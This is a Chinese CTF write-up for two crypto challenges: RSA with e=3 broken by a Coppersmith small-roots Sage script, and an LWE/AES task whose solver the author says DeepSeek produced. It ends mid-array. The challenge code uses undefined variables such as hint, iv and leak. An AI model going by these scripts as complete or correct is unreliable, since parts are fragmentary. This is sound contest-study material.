第三届黄河流域网络安全技能挑战赛

sandwitch

三明治攻击，把题目和名字都给DeepSeek，并且LLM指导进行爆破得到flag

from Crypto.Util.number import *
import gmpy2
flag = b'flag{fake_flag}'
assert len(flag) == 39
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 0x3
pad1 = b'easy_problem'
pad2 = b'How_to_solve_it'
c = pow(bytes_to_long(pad1 + flag + pad2),e,n)
print(f'n = {n}')
print(f'c = {c}')

'''
n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503
'''

from sage.all import *
from Crypto.Util.number import bytes_to_long, long_to_bytes

n = 130210658110511504736422597261591182174531847806532340762131145212035478695205314931974421838392310731226415266775095601890938846830080329061111533796518633011922277343217149648494987341818402753017296362015915834670450122261511337212801488239810623226740266516836721952886027130703886460578247562781194524199
c = 58274335440051115211211273605191310114692293785750437685473044454042062899661976407492451518086227780147882738264722645944582899451063113444881286175099872016956825274378613983870549046907444680021237171113596116147511706486372974792692071549068969896395366667516390709069131700584308236332248449116109156503

pad1 = b'easy_problem'    # 12字节
pad2 = b'How_to_solve_it' # 15字节

A = bytes_to_long(pad1)
B = bytes_to_long(pad2)

# ------------------ 关键验证点 -------------------
# 1. 确认填充长度
assert len(pad1) == 12 and len(pad2) == 15, "填充长度错误"

# 2. 计算位移
total_shift_pad1 = (39 + len(pad2)) * 8  # (39+15)*8=432位
shift_flag = len(pad2) * 8               # 15*8=120位
assert total_shift_pad1 == 432 and shift_flag == 120, "位移计算错误"

# 3. 构造多项式
P.<x> = PolynomialRing(Zmod(n))
M = A * (2 ** total_shift_pad1) + x * (2 ** shift_flag) + B
f = (M**3 - c).monic()

# 4. 自动化参数遍历
success = False
for m in [3, 4, 5, 6]:                  # 遍历不同格维度
    for beta in [0.4, 0.45, 0.5]:       # 不同beta值
        for epsilon in [0.01, 0.02, 0.05]: # 不同epsilon
            print(f"\n尝试参数: m={m}, beta={beta}, epsilon={epsilon}")
            roots = f.small_roots(X=2**(39*8), beta=beta, epsilon=epsilon, m=m)
            if roots:
                flag = long_to_bytes(int(roots[0]))
                print(f"[+] 成功恢复Flag: {flag}")
                success = True
                break
            else:
                print(f"[-] 当前参数组合未找到根")
        if success: break
    if success: break

if not success:
    print("\n[!] 所有参数组合均失败，请检查：")
    print("    1. 填充结构是否与题目完全一致")
    print("    2. 确认n和c的值正确")
    print("    3. 尝试更高性能设备运行（增大m需要更多内存）")

Lattice

from Crypto.Util.number import *
from Crypto.Cipher import AES
import os
from secret import flag
import numpy as np


def gen(q, n, N, sigma):
    t = np.random.randint(0, high=q // 2, size=n)
    s = np.concatenate([np.ones(1, dtype=np.int32), t])
    A = np.random.randint(0, high=q // 2, size=(N, n))
    e = np.round(np.random.randn(N) * sigma**2).astype(np.int32) % q
    b = ((np.dot(A, t) + e).reshape(-1, 1)) % q
    P = np.hstack([b, -A])
    return P, s


def enc(P, M, q):
    N = P.shape[0]
    n = len(M)
    r = np.random.randint(0, 2, (n, N))
    Z = np.zeros((n, P.shape[1]), dtype=np.int32)
    Z[:, 0] = 1
    C = np.zeros((n, P.shape[1]), dtype=np.int32)
    for i in range(n):
        C[i] = (np.dot(P.T, r[i]) + (np.floor(q / 2) * Z[i] * M[i])) % q
    return C


q = 127
n = 3
N = int(1.1 * n * np.log(q))
sigma = 1.0

P, s = gen(q, n, N, sigma)


def prep(s):
    return np.array([int(b) for char in s for b in f"{ord(char):08b}"], dtype=np.int32)


C = enc(P, prep(hint), q)
P = P.tolist()
C = C.tolist()
print(f"{P=}")
print(f"{C=}")

'''
P=[[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C=[[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 87, 87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 17, 94, 119], [46, 95, 85, 5], [109, 58, 71, 42], [126, 29, 114, 73], [27, 70, 7, 125], [121, 66, 97, 111], [8, 21, 10, 57], [15, 62, 65, 8], [101, 79, 32, 74], [69, 42, 38, 58], [65, 81, 72, 16], [20, 81, 1, 126], [91, 111, 69, 33], [56, 84, 65, 66], [47, 78, 43, 100], [43, 90, 80, 25], [46, 55, 10, 60], [116, 110, 49, 116], [72, 115, 38, 104], [79, 43, 74, 106], [86, 113, 84, 76], [102, 2, 119, 3], [126, 25, 83, 44], [37, 83, 46, 40], [13, 75, 101, 101], [76, 93, 3, 63], [69, 9, 84, 37], [103, 47, 106, 80], [72, 104, 85, 19], [124, 118, 34, 81], [57, 25, 52, 119], [44, 56, 63, 90], [123, 46, 124, 31], [19, 116, 23, 77], [126, 78, 37, 93], [34, 95, 43, 98], [37, 90, 32, 97], [106, 8, 80, 8], [90, 5, 113, 68], [99, 40, 39, 18], [90, 37, 48, 45], [56, 13, 76, 6], [68, 33, 52, 102], [62, 45, 29, 123], [100, 21, 73, 92], [92, 18, 118, 23], [84, 86, 42, 83], [107, 8, 71, 52], [114, 106, 78, 85], [10, 120, 115, 119], [27, 49, 124, 16], [65, 40, 48, 37], [69, 42, 8, 29], [35, 39, 55, 102], [58, 19, 41, 75], [17, 2, 113, 12], [8, 34, 72, 75], [91, 32, 19, 52], [62, 50, 109, 78], [9, 115, 35, 50], [42, 83, 78, 41], [34, 94, 97, 58], [56, 73, 25, 115], [55, 12, 16, 86], [97, 95, 30, 92], [47, 105, 70, 68], [50, 18, 51, 23], [46, 57, 80, 29], [4, 66, 123, 24], [55, 53, 26, 36], [71, 59, 104, 91], [94, 3, 1, 34], [57, 8, 85, 102], [89, 73, 115, 25], [13, 38, 81, 76], [104, 30, 81, 104], [55, 101, 95, 101], [69, 65, 5, 11], [123, 105, 84, 125], [38, 110, 4, 28], [112, 115, 92, 71], [90, 120, 112, 39], [50, 18, 107, 71], [95, 63, 118, 93], [93, 111, 59, 55], [17, 15, 2, 88], [78, 126, 37, 12], [56, 112, 53, 12], [65, 34, 82, 100], [9, 94, 72, 99], [78, 76, 43, 91], [7, 88, 107, 31], [43, 91, 97, 4], [113, 112, 36, 15], [8, 97, 23, 84], [65, 92, 31, 63], [54, 38, 119, 103], [89, 50, 57, 50], [61, 37, 87, 0], [21, 35, 44, 22], [20, 32, 95, 116], [10, 94, 103, 84], [59, 29, 7, 50], [98, 33, 87, 33], [7, 96, 36, 67], [85, 10, 35, 98], [65, 49, 19, 62], [56, 67, 14, 91], [30, 49, 111, 77], [121, 49, 108, 119], [89, 67, 115, 69], [65, 8, 0, 82], [117, 57, 117, 23], [23, 38, 2, 98], [60, 28, 94, 93], [23, 65, 8, 114], [121, 105, 122, 40], [120, 12, 21, 112], [55, 51, 2, 77], [48, 41, 113, 62], [66, 82, 117, 119], [4, 15, 5, 21], [41, 14, 12, 80], [23, 61, 106, 16], [23, 53, 122, 68], [6, 54, 5, 101], [69, 49, 7, 79], [17, 70, 64, 88], [103, 30, 76, 31], [108, 82, 90, 109], [55, 56, 113, 37], [93, 99, 126, 44], [1, 46, 105, 124], [55, 54, 35, 115], [0, 89, 53, 97], [67, 111, 107, 80], [92, 122, 40, 64], [75, 2, 126, 118], [90, 84, 43, 74], [101, 69, 60, 17], [104, 10, 4, 122], [94, 4, 115, 91], [15, 11, 111, 105], [9, 7, 32, 101], [77, 18, 55, 56], [66, 7, 117, 108], [116, 121, 33, 66], [32, 41, 83, 125], [60, 52, 70, 58], [125, 54, 93, 15], [70, 19, 10, 58], [83, 94, 61, 126], [95, 85, 80, 44], [25, 89, 117, 74], [12, 17, 63, 87], [118, 80, 96, 26], [6, 97, 79, 38], [97, 3, 107, 95], [7, 82, 106, 92], [83, 100, 119, 95], [81, 26, 99, 56], [25, 60, 51, 122], [56, 18, 22, 84], [9, 72, 107, 114], [80, 97, 92, 52], [108, 47, 58, 46], [9, 47, 7, 47], [115, 68, 91, 7], [14, 120, 87, 122], [97, 15, 40, 79], [5, 92, 85, 93], [4, 97, 73, 63], [25, 22, 92, 108], [88, 4, 34, 86], [0, 43, 21, 57], [67, 90, 36, 50], [15, 126, 37, 12], [92, 73, 96, 71], [76, 107, 27, 115], [79, 8, 68, 55], [38, 12, 120, 126], [54, 46, 7, 69], [72, 114, 93, 60], [59, 98, 27, 102], [50, 76, 87, 19], [77, 107, 29, 40], [36, 73, 21, 123], [36, 89, 82, 74], [24, 73, 118, 86], [58, 89, 115, 106], [12, 27, 33, 72], [28, 94, 21, 26], [0, 79, 48, 110], [72, 62, 82, 57], [65, 84, 114, 97], [80, 68, 52, 52], [119, 35, 103, 101], [10, 67, 68, 69], [101, 17, 54, 40], [98, 46, 21, 42], [30, 39, 56, 118], [27, 33, 77, 114], [66, 74, 61, 63], [23, 13, 14, 47], [88, 30, 122, 119], [15, 58, 55, 52], [56, 27, 47, 45], [119, 95, 59, 14], [84, 69, 5, 83], [21, 35, 39, 36], [10, 92, 68, 17], [79, 67, 111, 38], [36, 1, 4, 117], [117, 30, 5, 7], [112, 15, 115, 123], [54, 47, 18, 93], [102, 111, 3, 68], [91, 91, 5, 44], [123, 118, 57, 32], [12, 121, 31, 103], [114, 52, 105, 12], [100, 28, 117, 102], [51, 42, 12, 124], [47, 1, 42, 47], [28, 3, 22, 100], [103, 105, 119, 24], [101, 59, 13, 78], [79, 36, 61, 54], [11, 46, 75, 116], [31, 73, 118, 0], [92, 32, 0, 124], [77, 85, 25, 90], [29, 21, 74, 7], [3, 66, 11, 8], [112, 91, 50, 53], [45, 113, 99, 123], [35, 65, 85, 22], [108, 99, 42, 1], [103, 113, 116, 72], [125, 74, 112, 24], [75, 79, 80, 12], [83, 44, 94, 86], [64, 20, 0, 8], [104, 126, 31, 120], [85, 75, 61, 74], [36, 93, 36, 102], [70, 54, 101, 83], [90, 46, 109, 83], [112, 126, 114, 23], [16, 123, 97, 62], [118, 86, 108, 53], [99, 18, 2, 18], [103, 3, 38, 8], [99, 49, 123, 81], [37, 75, 89, 53], [34, 77, 27, 122], [29, 8, 40, 66], [119, 13, 64, 83], [4, 108, 116, 121], [49, 87, 1, 92], [15, 63, 80, 62], [27, 81, 100, 83], [7, 90, 16, 0], [13, 50, 61, 65], [51, 64, 76, 5], [55, 100, 106, 66], [52, 102, 105, 2], [49, 34, 89, 116], [24, 55, 11, 27], [91, 48, 73, 38], [27, 5, 1, 126], [66, 55, 80, 19], [52, 118, 104, 43], [36, 1, 111, 60], [65, 4, 34, 17], [54, 22, 0, 39], [52, 30, 64, 62], [26, 40, 32, 86], [93, 71, 41, 47], [77, 23, 15, 9], [11, 20, 51, 31], [64, 50, 37, 50], [17, 49, 80, 37], [119, 115, 115, 50], [20, 86, 27, 5], [101, 65, 17, 78], [56, 25, 125, 56], [16, 118, 2, 96], [114, 108, 69, 121], [14, 37, 76, 101], [113, 124, 121, 82], [43, 120, 35, 94], [82, 67, 23, 43], [9, 79, 47, 122], [39, 28, 110, 31], [35, 48, 27, 16], [72, 8, 115, 66], [54, 46, 122, 19], [77, 77, 30, 74], [58, 63, 81, 96], [6, 122, 75, 63], [115, 31, 119, 110], [82, 86, 89, 1], [79, 100, 6, 110], [117, 67, 15, 13], [4, 15, 63, 0], [106, 108, 122, 107], [34, 72, 0, 114], [20, 0, 32, 56], [121, 104, 66, 3], [86, 28, 76, 84], [85, 9, 60, 45], [95, 80, 78, 65], [39, 85, 50, 49], [42, 103, 36, 90], [70, 99, 116, 117], [34, 15, 40, 52], [24, 49, 19, 31], [98, 90, 95, 89], [63, 45, 40, 77], [114, 14, 30, 106], [10, 35, 116, 9], [103, 111, 112, 16], [71, 112, 71, 32], [77, 31, 105, 64], [84, 87, 24, 67], [1, 27, 123, 57], [104, 29, 87, 123], [110, 39, 67, 7], [28, 70, 108, 113], [96, 9, 101, 36], [13, 28, 6, 13], [69, 81, 89, 26], [79, 113, 77, 91], [112, 62, 104, 117], [109, 95, 55, 83], [78, 68, 98, 14], [73, 79, 96, 12], [108, 39, 97, 49], [27, 111, 106, 100], [82, 70, 9, 36], [48, 31, 90, 70], [99, 92, 45, 35], [55, 100, 31, 37], [75, 17, 69, 35], [12, 38, 119, 112], [103, 34, 63, 76], [26, 19, 91, 111], [74, 122, 12, 78], [64, 117, 16, 60], [2, 97, 122, 106], [62, 79, 56, 30], [71, 47, 13, 22], [38, 78, 116, 16], [87, 28, 94, 76], [77, 126, 94, 116], [83, 46, 104, 90], [5, 95, 13, 26], [47, 10, 46, 115], [82, 19, 91, 70], [111, 72, 49, 65], [18, 103, 59, 72], [17, 37, 56, 24], [19, 120, 24, 64], [28, 40, 11, 20], [18, 19, 80, 62], [37, 11, 74, 14], [109, 97, 75, 72], [116, 65, 52, 121], [95, 63, 82, 122], [88, 93, 54, 93], [77, 30, 65, 121], [99, 121, 42, 87], [62, 52, 44, 6], [79, 60, 55, 4], [96, 64, 6, 20], [94, 114, 90, 8], [123, 98, 29, 27], [116, 84, 31, 80], [9, 77, 45, 45], [120, 33, 63, 15], [51, 44, 66, 25], [2, 46, 72, 94], [107, 113, 50, 46], [115, 64, 126, 85], [64, 10, 28, 78], [84, 112, 64, 103], [59, 114, 15, 82], [65, 122, 104, 89], [113, 122, 21, 11], [69, 106, 19, 78], [42, 93, 125, 0], [7, 123, 82, 70], [103, 114, 62, 92], [15, 30, 78, 114], [4, 78, 111, 60], [40, 80, 34, 55], [3, 87, 120, 27], [122, 64, 3, 122], [24, 49, 31, 81], [26, 43, 100, 19], [52, 78, 2, 97], [116, 45, 15, 33], [21, 119, 92, 86], [28, 118, 71, 24], [106, 15, 0, 79], [36, 4, 52, 73], [22, 43, 8, 60], [96, 22, 9, 100], [19, 64, 26, 96], [97, 61, 22, 39], [6, 112, 76, 38], [58, 6, 97, 94], [103, 87, 87, 101], [17, 49, 80, 37], [117, 33, 26, 8], [59, 108, 78, 91], [113, 28, 30, 44], [119, 78, 72, 20], [49, 101, 77, 2], [26, 18, 35, 7], [34, 38, 99, 37], [45, 52, 90, 27], [108, 31, 118, 67], [3, 37, 29, 88], [111, 96, 12, 111], [91, 111, 106, 100], [52, 78, 117, 80], [14, 51, 87, 0], [1, 52, 116, 1], [117, 2, 33, 48], [57, 0, 48, 34], [59, 14, 84, 63], [82, 83, 8, 82], [58, 100, 32, 33], [75, 29, 112, 103], [0, 49, 45, 54], [94, 9, 51, 110], [54, 61, 27, 47], [88, 89, 23, 37], [73, 43, 0, 32], [123, 6, 35, 78], [73, 72, 119, 64], [81, 46, 11, 102], [42, 124, 47, 8], [50, 66, 3, 40], [116, 7, 51, 20], [47, 112, 99, 7], [42, 37, 86, 89], [18, 74, 78, 101], [57, 85, 75, 7], [26, 90, 35, 10], [72, 126, 10, 77], [55, 12, 5, 78], [37, 87, 85, 96], [91, 9, 114, 68], [79, 76, 44, 20], [84, 52, 63, 56], [95, 9, 22, 117], [96, 38, 50, 67], [43, 114, 45, 56], [94, 21, 74, 107], [92, 82, 81, 71], [40, 10, 10, 90], [20, 18, 15, 56], [72, 2, 30, 22], [50, 31, 123, 20], [85, 40, 115, 115], [93, 1, 48, 47], [111, 118, 45, 34], [9, 122, 37, 121], [60, 27, 77, 41], [122, 38, 22, 39], [115, 66, 74, 126], [77, 67, 90, 78], [96, 3, 53, 52], [5, 26, 120, 101], [45, 100, 72, 6], [106, 56, 87, 77], [52, 68, 102, 95], [1, 13, 36, 33], [58, 27, 35, 8], [52, 5, 38, 35], [102, 82, 63, 47], [24, 71, 119, 43], [11, 36, 90, 13], [11, 93, 27, 23], [4, 107, 26, 125], [85, 9, 5, 13], [116, 25, 55, 119], [73, 82, 73, 2], [40, 123, 77, 41], [10, 98, 51, 111], [23, 79, 120, 54], [56, 18, 22, 84], [61, 115, 51, 109], [33, 5, 12, 121], [8, 81, 35, 70], [22, 39, 103, 2], [38, 74, 66, 126], [83, 20, 117, 85], [8, 32, 91, 98], [37, 31, 94, 119], [7, 30, 45, 43], [68, 16, 124, 97], [86, 124, 37, 21], [29, 101, 15, 30], [27, 31, 52, 45], [47, 37, 102, 3], [117, 49, 54, 89], [48, 94, 126, 66], [42, 115, 63, 104], [14, 74, 6, 112], [68, 125, 4, 5], [66, 3, 78, 52], [108, 33, 6, 77], [77, 99, 16, 52], [61, 78, 73, 70], [108, 106, 124, 0], [23, 35, 119, 118], [125, 124, 37, 65], [69, 30, 61, 110], [77, 10, 120, 118], [53, 121, 24, 30], [87, 32, 29, 63], [54, 64, 1, 3], [16, 59, 104, 25], [30, 6, 59, 102], [43, 120, 35, 94], [89, 13, 69, 39], [87, 78, 100, 14], [83, 17, 14, 4], [24, 49, 31, 81], [73, 32, 72, 10], [0, 22, 61, 54], [81, 42, 70, 13], [108, 56, 52, 2], [25, 99, 116, 72], [66, 23, 18, 102], [121, 115, 47, 12], [96, 37, 123, 48], [64, 69, 4, 39], [78, 38, 124, 31], [27, 69, 10, 70], [5, 29, 2, 85], [30, 45, 56, 7], [31, 25, 120, 61], [36, 89, 89, 118], [98, 63, 18, 21], [121, 83, 36, 57], [60, 5, 86, 17], [121, 55, 117, 58], [12, 96, 4, 27], [119, 63, 124, 37], [96, 27, 45, 91], [42, 119, 8, 103], [104, 42, 68, 37], [104, 55, 41, 38], [120, 3, 50, 87], [120, 121, 20, 67], [58, 123, 50, 28], [103, 62, 58, 20], [97, 27, 89, 102], [7, 51, 56, 108], [73, 60, 10, 77], [56, 72, 103, 69], [101, 89, 18, 66], [115, 35, 80, 36], [98, 103, 39, 63], [29, 126, 67, 76], [27, 97, 15, 79], [36, 6, 17, 90], [126, 54, 101, 42], [115, 66, 74, 126], [78, 80, 62, 83], [60, 11, 31, 88], [16, 73, 108, 13]]
'''

key = os.urandom(16)
encrypted = AES.new(key=key, iv=iv, mode=AES.MODE_CBC).encrypt(b"".join([pad(i.encode(), 16) for i in flag]))

print(leak)
print(key)
print(encrypted)

'''
-3.257518803980229925210589904230583482986646342139415561576950148286382674434770529248486501793457710730252401258721482142654716015216299244487794967600132597049154513815052213387666360825101667524635777006510550117512116441539852315185793280311905620746025669520152068447372368293640072502196959919309286241
b'\x8fj\x94\x98-\x1fd\xd5\x89\xbe\xa9*Tu\x90\xb7'
b'\x9fT@\xbc\x82\x8esQ\x1e\xd8\x1d\xdb\x9b\xb4\xf8rU\xc8\xa0\xcb\xaf H\xa9.\x04\x1e\xd2\x92\x1f\x0fBja-\x965x\xa8@\xc9x\xf9\xaf\x87\xd1\xa5}\xfc\x1b\xe0#\xc3m\xc9\x8973\x1c\x1f\x13\x8f\xb2a\xae\xa9]\xb9\xc2\xe8\x83A\x80\x13g\xc9a\x1c<\x8a\x9c&\xd9\xbd\x06\xef\xba9\xb0\x03\x9f\x022\xc9\x13\x9a\xffXPG\xc6o\xc0\xeaV7)XG9L\x84N7U\xe3Wn0G\x8e\xd3\x04(\n\x08\xb9\x17\xe6\xf1\xaa\xb7\x8a@$\x16\x13\x06A\x00\xc9Z\xdf\x7fQ\xc9\x08\xb4\xf3P\xfcpe\xe2\xeb\x96\x0e(-\xde\x17\xd1\x01\x1c_\x82\x8b\x9fw\xc8\x86\xfbw\xb5\xf7\xd0\xc8\x1784\xe3?\x00\x0b.)\xb7\xbc\x8e{\xe0\xae\x8d$\x0f\x19\'\xb6\xee@d\x00\xd9\x84\x8c\x0e\xa3,\xc6a\xa3\xba*1\xfd<\xfd\x18\xd6\x9e\x8c4\x8e#\xfd\xbd&0R\xeddE,\xed\xb6\x1e\x00\x11\xa6K\xd3\x1dT\x8c5\x8e\x00\xea\x10\xe9\'u"B#\xa1#\xd8\xe3\xf5j\xbc\x94M\xda\xe3\xcb*\xf0W1\xa0\x80\x1d\xfc\xbfo\x01?(da\r\xb6\x86\xd0\x90\x88Z\xa1`B\x89\x89\x89\xb3v\xa5\xf0\xe0\x0c\x8e\xcc+P\xfc\xfd#\x83\xe9\x93\x96\n\xf2\xa5\xfb\xc3\xc5\xaa\x9e\x89\x93\xb6\xf5\xea\x8c%NY\xc3\x0eR\xfas\xa1\x13\xf2/*\xce\x8b_:_r\xeb\xbe\x0b\x8a\x8c\x97\x7f|m}\xae\xa9I\x95\xcc\xe7\x80\xa5yC4\x1f5\xa4P\xc5\xbf.\xf9V\xe8|\xbb\xc3\xcb\x98&\'JB\x99\x94\xc0\r$\x0b\xbe48u\xeb\xca\xa1\xfbb\xd8_R\x97\x8e\xaeI\xfc\xc2\xb2\xd2#@\xec\x16\xf1\xd7eCQ\x1cO\x13\xca\xb5\xd3\x1a\xb1\xf1_D\x80\x06\xa5\xbe\xbev\xbd\xd6\xbb\x9a\xc9x\x9cf:\xcb>\xa2\xe1\xcad\xde]aw\xa0\xdc\xb2\xb3{+\x85\x8d\x8b\xc5\rT\xcc\xd9X\xd5\x9b\r<\x99m\xb8b6s\xbfp\x0eo~\xe9&\xb2{\xbe\xee\x93\xd2N1\\\x94\x968IWO7\xcb\xb6e\x80\xf7\x9air\xb2~\x17\x1cF\x0f\x82T]RBX\xdex\x13\x85\xfa\xcd-\xce\xdc\xe4\xe5^\x99u\xb5\x01\xd0-\xc3C\xcd\xc4y6\xb7\x9d|L1\xe74\xf7\x8cH\xe9\xa9\xfav\n\xec;\xf2\xa2w\xfb\x13_b\r)z!\xa3\xc8\xa8\xc2\xd2\x10\x00\x11\x11\r\xb2&\xfb\x04&\x84">x6l[\x06n>\xa0\xbe\x9c`\xa7\x9e\xe0\xfb\x85\x91\xc4,\xcf\xac\xe11@a\xed3@\xfd}\x8e\xfaTp\xcb7\xe7\xbf\xd4\xe0~b\xd9\xe0<\xba\x81\xd4"e\xfc\x939|j#0H\x86\xf8\x0b\x03\xd2\xe8\xf5\xe55\xdc\xc8\x06\\\xb7)\xcc\x9b\'\xf12'
'''

让DeepSeek做

import numpy as np
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# Given data
P = [[87, -27, -52, -29], [57, -41, -24, -60], [76, -17, -55, -37], [75, -46, -33, -21], [121, -55, -33, -34], [47, -4, -34, -45], [112, -33, -44, -16], [74, -44, -5, -25], [20, -21, -16, -49], [89, -21, -54, -24], [18, -23, -53, -1], [35, -40, -4, -29], [105, -54, -2, -8], [44, -24, -43, -36], [111, -15, -15, -54]]
C = [[24, 75, 81, 85], [24, 14, 85, 102], [115, 1, 5, 21], [58, 118, 104, 77], [65, 42, 101, 103], [33, 38, 50, 67], [7, 81, 38, 58], [117, 101, 54, 11], [44, 29, 81, 8], [59, 114, 70, 121], [62, 13, 9, 105], [11, 43, 97, 23], [39, 82, 75, 97], [122, 113, 14, 30], [70, 102, 116, 5], [58, 44, 61, 20], [73, 119, 59, 28], [119, 68, 57, 122], [61, 91, 83, 44], [103, 29, 1, 73], [47, 60, 120, 125], [17, 126, 14, 21], [104, 8, 78, 123], [72, 121, 54, 74], [48, 104, 49, 66], [72, 56, 27, 69], [34, 110, 41, 54], [33, 54, 74, 44], [70, 65, 11, 113], [122, 3, 69, 35], [58, 7, 39, 64], [59, 106, 49, 66], [77, 92, 87, 92], [95, 21, 96, 83], [67, 55, 30, 73], [99, 54, 18, 90], [101, 102, 126, 107], [81, 46, 104, 83], [38, 24, 94, 60], [114, 105, 76, 97], [22, 115, 20, 67], [40, 72, 110, 65], [111, 92, 106, 117], [5, 123, 21, 96], [41, 14, 23, 114], [113, 75, 43, 65], [56, 3, 61, 48], [40, 101, 16, 114], [42, 84, 95, 13], [36, 110, 91, 107], [4, 13, 60, 74], [24, 80, 125, 76], [123, 26, 27, 119], [31, 87, 6, 123], [61, 106, 73, 120], [66, 10, 36, 65], [91, 38, 46, 9], [121, 20, 106, 48], [123, 21, 78, 27], [22, 74, 55, 110], [47, 49, 118, 76], [30, 10, 16, 118], [43, 19, 52, 61], [100, 9, 37, 35], [20, 102, 111, 94], [116, 63, 55, 43], [13, 110, 42, 14], [46, 65, 71, 28], [82, 5, 76, 74], [86, 34, 117, 84], [28, 44, 82, 50], [76, 79, 77, 11], [68, 39, 51, 89], [83, 93, 95, 2], [54, 108, 101, 82], [99, 90, 122, 37], [16, 92, 79, 12], [67, 86, 24, 36], [80, 94, 106, 59], [50, 56, 95, 98], [33, 68, 89, 40], [74, 124, 14, 82], [88, 93, 54, 93], [51, 17, 124, 31], [17, 17, 45, 35], [113, 71, 76, 44], [48, 6, 120, 4], [36, 91, 108, 11], [2, 41, 58, 72], [42, 59, 51, 81], [73, 22, 79, 27], [85, 35, 29, 98], [76, 76, 37, 22], [82, 29, 42, 27], [75, 114, 37, 106], [40, 69, 53, 73], [39, 44, 33, 121], [94, 85, 92, 54], [91, 77, 124, 46], [108, 31, 101, 84], [35, 33, 97, 45], [99, 32, 17, 14], [1, 66, 11, 35], [78, 100, 95, 81], [73, 49, 14, 37], [70, 9, 107, 2], [84, 98, 92, 62], [123, 87, 87, 110], [3, 81, 111, 28], [20, 2, 91, 37], [93, 101, 77, 93], [27, 16, 31, 105], [95, 81, 87, 17], [10, 103, 21, 102], [81, 57, 118, 82], [15, 92, 60, 71], [16, 84, 126, 49], [35, 26, 2, 120], [70, 86, 45, 9], [29, 8, 40, 66], [99, 77, 14, 9], [12, 70, 50, 52], [21, 21, 85, 54], [91, 94, 100, 85], [9, 42, 47, 14], [117, 55, 17, 99], [53, 45, 4, 72], [49, 10, 27, 121], [108, 61, 73, 42], [121, 42, 41, 71], [49, 63, 50, 117], [5, 78, 24, 101], [0, 117, 21, 46], [90, 43, 47, 32], [74, 85, 118, 84], [13, 73, 18, 66], [95, 24, 120, 18], [94, 21, 111, 34], [66, 68, 80, 21], [102, 49, 57, 55], [25, 85, 107, 98], [8, 18, 88, 12], [18, 6, 86, 82], [18, 91, 126, 115], [26, 11, 30, 35], [88, 78, 76, 74], [51, 75, 76, 15], [60, 24, 72, 27], [91, 72, 44, 104], [84, 113, 39, 116], [41, 83, 91, 74], [84, 